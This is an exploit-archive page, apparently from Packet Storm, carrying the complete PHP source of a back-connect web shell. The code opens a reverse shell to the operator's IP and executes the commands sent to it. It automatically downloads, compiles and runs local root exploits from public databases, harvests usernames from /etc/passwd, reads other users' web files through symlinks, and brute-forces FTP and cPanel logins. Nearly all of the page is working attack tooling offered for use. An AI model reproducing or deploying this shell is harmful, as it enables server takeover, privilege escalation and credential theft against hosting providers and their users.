exploit the possibilities

Miyachung BackConnect Shell

Miyachung BackConnect Shell
Posted Jul 31, 2013
Authored by miyachung

This is a PHP shell that provides the ability to connect back, grab files, perform exploit searches for local roots and compile and run them, and much more.

tags | tool, shell, local, root, php, rootkit
systems | unix
MD5 | 91d8389396e1acf53e48ff1cdb1cd048

Miyachung BackConnect Shell

Change Mirror Download
<?php
/*
===================================================================
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
===================================================================
. Miyachung BackConnect Shell
. Written by Miyachung
. Janissaries.Org
. Contact: miyachung@hotmail
. Video : https://www.youtube.com/watch?v=sWUR9gt4ia0
Commands works with shell_exec() function

@ Options
- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release
- grabusr = Grab users from /etc/passwd and save into a file ( users )
- domains = List domains from /var/named
- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )
- catln = Cat file with ln -s method
- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )
- home = Change dir into home folder
- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )
- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )
*/
ob_start();
$server_ip = $_SERVER['SERVER_ADDR'];
$your_ip = getenv('REMOTE_ADDR');
$your_port = 443;
$timeout = 5;

if(!empty($server_ip) && !empty($your_ip) && !empty($your_port) && !empty($timeout))
{
$create = new BC($your_ip,$your_port,$server_ip,$timeout);
}
/*
@ Connection Class
*/
class BC
{
private $your_ip;
private $your_port;
private $server_ip;
private $timeout;
private $homefolder;
public function __construct($yip,$yp,$sip,$t)
{
$this->your_ip = $yip;
$this->your_port = $yp;
$this->server_ip = $sip;
$this->timeout = $t;
print("<title>Miyachung BackConnect Shell</title>");
print("<strong>Miyachung BackConnect Shell</strong>\n<br>");
print("Your ip is <strong>$this->your_ip</strong>\n<br>");
print("Your port is <strong>$this->your_port</strong>\n<br>");
print("Server ip is <strong>$this->server_ip</strong>\n<br>");
print("Timeout seconds <strong>$this->timeout</strong>\n\n<br><br>");

print("Trying to create shell process <strong>$this->your_ip</strong> with <strong>$this->your_port</strong> on <strong>$this->server_ip</strong>\n<br>");
ob_flush(); flush();
$this->createshell();
}
private function createshell()
{
$socket = @fsockopen($this->your_ip,$this->your_port,$errno,$errstr,$this->timeout) or die("<font color='red'>Unfortunately could not spawn shell</font>\n<br>");
print("<font color='green'>Shell process opened to <strong>$this->server_ip</strong> > <strong>$this->your_ip:$this->your_port</strong></font>\n<br>");
ob_flush(); flush();
fwrite($socket,"=============================================================");
fwrite($socket,"
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
");
fwrite($socket,"Welcome to the BackConnect Shell !!\n");
fwrite($socket,"Written by Miyachung\n");
fwrite($socket,"Informations\n");
fwrite($socket,"------------------------------------------------\n");
fwrite($socket,"uname -a: ".@shell_exec("uname -a"));
fwrite($socket,"whoami: ".@shell_exec("whoami"));
fwrite($socket,"id: ".@shell_exec("id"));
fwrite($socket,"pwd: ".@shell_exec("pwd"));
fwrite($socket,"@ Options\n\n");
fwrite($socket,"- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release\n");
fwrite($socket,"- grabusr = Grab users from /etc/passwd and save into a file ( users )\n");
fwrite($socket,"- domains = List domains from /var/named\n");
fwrite($socket,"- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )\n");
fwrite($socket,"- catln = Cat file with ln -s method\n");
fwrite($socket,"- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )\n");
fwrite($socket,"- home = Change dir into home folder\n");
fwrite($socket,"- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n");
fwrite($socket,"- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n");
$this->homefolder = trim(@shell_exec("pwd"));
fwrite($socket,"=============================================================\n");
$result= @shell_exec("whoami");
fwrite($socket,$result);
print "<font color='green'>Command whoami;</font>\n";
print $result;
ob_flush(); flush();
preg_match("#([0-9]).([0-9]).([0-9]+)-([a-z0-9]+)#si",@shell_exec("uname -r"),$version);
$version1 = $version[0];
$version2 = $version[1].".".$version[2].".".$version[3];
print "<pre>";
while(1)
{
$enter = fgets($socket);
if(preg_match('#exit#',$enter)){fwrite($socket,"Process closed\n");exit("Process closed");}
if(preg_match('#exploit#',$enter)){$this->search($version1,$socket);$this->search($version2,$socket);}
if(preg_match('#grabusr#',$enter)){$this->grab_users($socket);}
if(preg_match('#catln (.+)#',$enter,$file)){$this->catln($file[1],$socket);}
if(preg_match('#index (.+)#',$enter,$file)){$this->index($file[1],$socket);}
if(preg_match('#getf (.+)#',$enter,$file)){$this->getf($file[1],$socket);}
if(preg_match('#ftp (.+)#',$enter,$file)){$this->ftp($file[1],$socket);}
if(preg_match('#cpanel (.+)#',$enter,$file)){$this->cpanel($file[1],$socket);}
if(preg_match('#domains#',$enter)){$this->domains($socket);}
if(eregi('home',$enter)){chdir($this->homefolder);}
if(strpos($enter,'cd ..')){
$curr = getcwd();
$explode = explode("/",$curr);
$c = count($explode);
unset($explode[$c-1]);
$explode = array_values(array_filter($explode));
$path = implode("/",$explode);
$path = "/".$path;
if(!chdir($path)){fwrite($socket,"Can't chdir into $path : Permission denied\n");}
}
elseif(preg_match('#cd (.+)#',$enter,$dir)){
$curr = getcwd();
if(preg_match("#\/#si",$dir[1]))
{
if(!chdir($dir[1])){fwrite($socket,"Can't chdir into $dir[1] : Permission denied\n");}
}
else
{
if(!chdir($curr."/".$dir[1])){fwrite($socket,"Can't chdir into $curr/$dir[1] : Permission denied\n");}
}

}
$result= @shell_exec(trim($enter));
fwrite($socket,$result);
print "<font color='green'>Command ".trim($enter).";</font>\n";
print $result;
ob_flush(); flush();
}
print "</pre>";
fclose($socket);
}
private function search($version,$socket)
{
fwrite($socket,"Release: $version\n");
print("Release: $version\n<br>");
ob_flush();flush();
fwrite($socket,"Searching Exploit-DB for local root exploits..\n");
print("Searching Exploit-DB for local root exploits..\n<br>");
$exploit_db = $this->curl("http://www.exploit-db.com/search/?action=search&filter_description=$version");
if(preg_match('/No results/si',$exploit_db))
{
fwrite($socket,"Not found any exploits\n");
print("Not found any exploits\n<br>");
ob_flush();flush();
}
else
{
fwrite($socket,"==================== Possible Exploits =====================\n");
print("==================== Possible Exploits =====================\n<br>");
ob_flush();flush();
preg_match_all('#<td class="list_explot_description">(.*?)<\/td>#si',$exploit_db,$list);
foreach($list[1] as $listx)
{
preg_match('#<a href="(.*?)">(.*?)<\/a>#si',$listx,$exploit);
fwrite($socket,"[+] ".$exploit[2]."\n");
print("[+] ".$exploit[2]."\n<br>");
fwrite($socket,"Trying pwn this server with this exploit\n");
print("Trying pwn this server with this exploit\n<br>");
fwrite($socket,"Downloading => ".$exploit[1]."\n");
print("Downloading => ".$exploit[1]."\n<br>");
ob_flush();flush();
$download = $this->download($exploit[1]);
if($download != false)
{
fwrite($socket,"File downloaded saved as $download\n");
print("File downloaded saved as $download\n<br>");
fwrite($socket,"Trying compile to $download file\n");
print("Trying compile to $download file\n<br>");
ob_flush();flush();
$withoutc = str_replace(".c","",$download);
@shell_exec("gcc $download -o $withoutc");
if(file_exists($withoutc))
{
fwrite($socket,"File compiled\n");
print("File compiled\n<br>");
fwrite($socket,"Setting chmod options\n");
print("Setting chmod options\n<br>");
@shell_exec("chmod +x $withoutc");
fwrite($socket,"Running exploit..!\n");
print("Running exploit..!\n<br>");
ob_flush();flush();
@shell_exec("./$withoutc");
}
else
{
fwrite($socket,"File doesn't compile\n");
print("File doesn't compile\n<br>");
ob_flush();flush();
}

}
else
{
fwrite($socket,"File doesn't download\n");
print("File doesn't download\n<br>");
ob_flush();flush();
}

}
fwrite($socket,"==================== Possible Exploits =====================\n");
print("==================== Possible Exploits =====================\n<br>");
ob_flush();flush();
}
fwrite($socket,"Searching 1337day for local root exploits..\n");
print("Searching 1337day for local root exploits..\n<br>");
ob_flush();flush();
$day1337 = $this->curl("http://www.1337day.com/search","agree=Ok&dong=$version&submit_search=Submit");
preg_match_all("#<a href='/exploit/description/(.*?)' >(.*?)<\/a>#si",$day1337,$exploits);
if($exploits[1])
{
fwrite($socket,"==================== Possible Exploits =====================\n");
print("==================== Possible Exploits =====================\n<br>");
ob_flush();flush();
foreach($exploits[1] as $i => $exploit)
{
fwrite($socket,"[+] ".$exploits[2][$i]."\n");
print("[+] ".$exploits[2][$i]."\n<br>");
fwrite($socket,"Trying pwn this server with this exploit\n");
print("Trying pwn this server with this exploit\n<br>");
$exploit_link = "http://www.1337day.com/exploit/$exploit";
fwrite($socket,"Downloading => ".$exploit_link."\n");
print("Downloading => ".$exploit_link."\n<br>");
ob_flush();flush();
$download = $this->day1337download($exploit_link);
if($download != false)
{
fwrite($socket,"File downloaded saved as $download\n");
print("File downloaded saved as $download\n<br>");
fwrite($socket,"Trying compile to $download file\n");
print("Trying compile to $download file\n<br>");
ob_flush();flush();
$withoutc = str_replace(".c","",$download);
@shell_exec("gcc $download -o $withoutc");
if(file_exists($withoutc))
{
fwrite($socket,"File compiled\n");
print("File compiled\n<br>");
fwrite($socket,"Setting chmod options\n");
print("Setting chmod options\n<br>");
@shell_exec("chmod +x $withoutc");
fwrite($socket,"Running exploit..!\n");
print("Running exploit..!\n<br>");
ob_flush();flush();
@shell_exec("./$withoutc");
}
else
{
fwrite($socket,"File doesn't compile\n");
print("File doesn't compile\n<br>");
ob_flush();flush();
}

}

}
fwrite($socket,"==================== Possible Exploits =====================\n");
print("==================== Possible Exploits =====================\n<br>");
ob_flush();flush();
}
else
{
fwrite($socket,"Not found any exploits\n");
print("Not found any exploits\n<br>");
ob_flush();flush();
}
}
private function curl($site,$post=null)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,$site);
if($post != null)
{
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
$exec = curl_exec($ch);
curl_close($ch);
return $exec;
}
private function download($url)
{
preg_match('#\/exploits\/(.+)#si',$url,$filename);
$filename = $filename[1].".c";
$url = str_replace("exploits","download",$url);
$openurl = @file_get_contents($url);
if($openurl && file_put_contents($filename,$openurl)){
return $filename;
}
else
{
return false;
}

}
private function day1337download($url)
{
preg_match('#\/exploit\/(.+)#si',$url,$filename);
$filename = $filename[1].".c";
$data = $this->curl($url,"agree=Ok");
preg_match("#<pre class='brush: plain; tab-size: 8'>(.*?)<\/pre>#si",$data,$content);
if(file_put_contents($filename,$content))
{
return $filename;
}
else
{
return false;
}

}
private function grab_users($socket)
{
$read = file("/etc/passwd");
$x0x = "";
foreach($read as $text)
{
$text = trim($text);
$user = explode(":",$text);
$user = $user[0];
$xox .= $user."\r\n";
fwrite($socket,$user."\n");
print($user."\n");
}
fwrite($socket,"Grabbed ".count($read)." users from /etc/passwd\n");
print("Grabbed ".count($read)." users from /etc/passwd\n");
$save = $this->save_as("users",$xox,"wb");
if($save){fwrite($socket,"Saved into file as 'users'\n");print("Saved into file as 'users'\n");}else{fwrite($socket,"Doesn't save into file\n");print("Doesn't save into file\n");}
}
private function catln($file,$socket)
{
$savefile = uniqid();
@shell_exec("ln -s $file ".$savefile);
if(file_exists($savefile))
{
fwrite($socket,file_get_contents($savefile));
print(file_get_contents($savefile));
fwrite($socket,"File name $savefile\n");
print("File name $savefile\n");
}
else
{
fwrite($socket,"File doesn't read\n");
print("File doesn't read\n");
}

}
private function index($file,$socket)
{
$etc = file('/etc/passwd');
$count= 0;
foreach($etc as $txt)
{
$txt = trim($txt);
$user= explode(":",$txt);
$user= $user[0];
$path= "/home/$user/public_html/$file";
@shell_exec("cp $file $path");
if(file_exists($path))
{
fwrite($socket,"File created: ".$path."\n");
print("File created: ".$path."\n");
$count++;
}

}
fwrite($socket,"Completed\n");
print("Completed\n");
fwrite($socket,"File copied into $count dirs\n");
print("File copied into $count dirs\n");
}
private function getf($file,$socket)
{
$etc = file('/etc/passwd');
$count = 0;
foreach($etc as $txt)
{
$txt = trim($txt);
$user= explode(":",$txt);
$user= $user[0];
$path= "/home/$user/public_html/$file";
if(file_exists($path))
{
fwrite($socket,"File found: ".$path."\n");
print("File found: ".$path."\n");
$content = file_get_contents($path);
if($content)
{
$save = $this->save_as($user."-".$file,$content);
if($save){
fwrite($socket,"File is readable,saved into file named $user-$file\n");
print("File is readable,saved into file named $user-$file\n");
$count++;
}
else
{
fwrite($socket,"File is readable but current dir is not writable\n");
print("File is readable but current dir is not writable\n");
}

}
else
{
@shell_exec("ln -s $path $user-$file");
if(file_exists($user[0]."-".$file)){
fwrite($socket,"File is read with ln -s method,saved into file named $user-$file\n");
print("File is read with ln -s method,saved into file named $user-$file\n");
$count++;
}
else
{
fwrite($socket,"File is not readable\n");
print("File is not readable\n");
}

}

}

}
fwrite($socket,"Grabbed $count files\n");
print("Grabbed $count files\n");

}
private function domains($socket)
{
$x0x = "";
$c = 0;
$path = "/var/named";
$dir_handle = @opendir($path);
if($dir_handle)
{
while ($file = readdir($dir_handle))
{
if (!is_dir($path."/".$file) AND ($file != "..") AND ($file != ".")) {
$dosya = str_replace(".db","",$file);
fwrite($socket,$dosya."\n");
print($dosya."\n");
$x0x .= $dosya."\r\n";
$c++;
}

}
$save = $this->save_as("d0mains",$x0x,"wb");
if($save == false){fwrite($socket,"Got domains but can't save into a file this dir is not writable\n");print("Got domains but can't save into a file this dir is not writable\n");}
else
{
fwrite($socket,"Grabbed $c domains\n");
print("Grabbed $c domains\n");
fwrite($socket,"Saved into 'd0mains'\n");
print("Saved into 'd0mains'\n");
}
closedir($dir_handle);
}
else
{
fwrite($socket,"Doesn't read /var/named\n");
print("Doesn't read /var/named\n");
}

}
private function ftp($wordlist,$socket)
{
fwrite($socket,"Starting ftp crack..\n");
ob_flush();flush();
$open = file($wordlist);
$userx= array();
foreach($open as $pwd)
{
$pwd = trim($pwd);
fwrite($socket,"Password ".$pwd." trying on all users\n");
ob_flush();flush();
$users= file('/etc/passwd');
foreach($users as $user)
{
$user = trim($user);
$user = explode(":",$user);
$user = $user[0];
$userx[] = $user;
}
$userx = array_filter($userx);
$userx = array_unique($userx);
$userx = array_chunk($userx,25);
$multi = curl_multi_init();
foreach($userx as $u)
{
for($i=0;$i<=count($u)-1;$i++)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl[$i],CURLOPT_URL,"ftp://".$this->server_ip);
curl_setopt($curl[$i],CURLOPT_USERPWD,trim($u[$i]).":".$pwd);
curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
usleep(1);
}while($active>0);
foreach($curl as $cid => $cend)
{
$data[$cid] = curl_multi_getcontent($cend);
if(preg_match('#drw#si',$data[$cid]))
{
fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n");
$save = $this->save_as("ftps.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
ob_flush();flush();
}
else
{
fwrite($socket,"Not found $u[$cid]:$pwd\n");
print("Not found $u[$cid]:$pwd\n");
ob_flush();flush();
}
curl_multi_remove_handle($multi,$cend);
}
}

}

}
private function cpanel($wordlist,$socket)
{
fwrite($socket,"Starting cpanel crack..\n");
ob_flush();flush();
$open = file($wordlist);
$userx= array();
foreach($open as $pwd)
{
$pwd = trim($pwd);
fwrite($socket,"Password ".$pwd." trying on all users\n");
ob_flush();flush();
$users= file('/etc/passwd');
foreach($users as $user)
{
$user = trim($user);
$user = explode(":",$user);
$user = $user[0];
$userx[] = $user;
}
$userx = array_filter($userx);
$userx = array_unique($userx);
$userx = array_chunk($userx,25);
$multi = curl_multi_init();
foreach($userx as $u)
{
for($i=0;$i<=count($u)-1;$i++)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl[$i],CURLOPT_URL,"https://$this->server_ip:2083/login/?login_only=1");
curl_setopt($curl[$i],CURLOPT_POSTFIELDS,"user=".trim($u[$i])."&pass=$pwd");
curl_setopt($curl[$i],CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl[$i],CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
usleep(1);
}while($active>0);
foreach($curl as $cid => $cend)
{
$data[$cid] = curl_getinfo($cend);
if($data[$cid]['http_code'] != 401)
{
fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n");
$save = $this->save_as("cpanels.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
ob_flush();flush();
}
else
{
fwrite($socket,"Not found $u[$cid]:$pwd\n");
print("Not found $u[$cid]:$pwd\n");
ob_flush();flush();
}
curl_multi_remove_handle($multi,$cend);
}
}

}

}
private function save_as($filename,$content,$type='ab')
{
$fopen = fopen($filename,$type);
if($fopen)
{
fwrite($fopen,$content);
fclose($fopen);
return true;
}
else
{
return false;
}

}
}
?>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close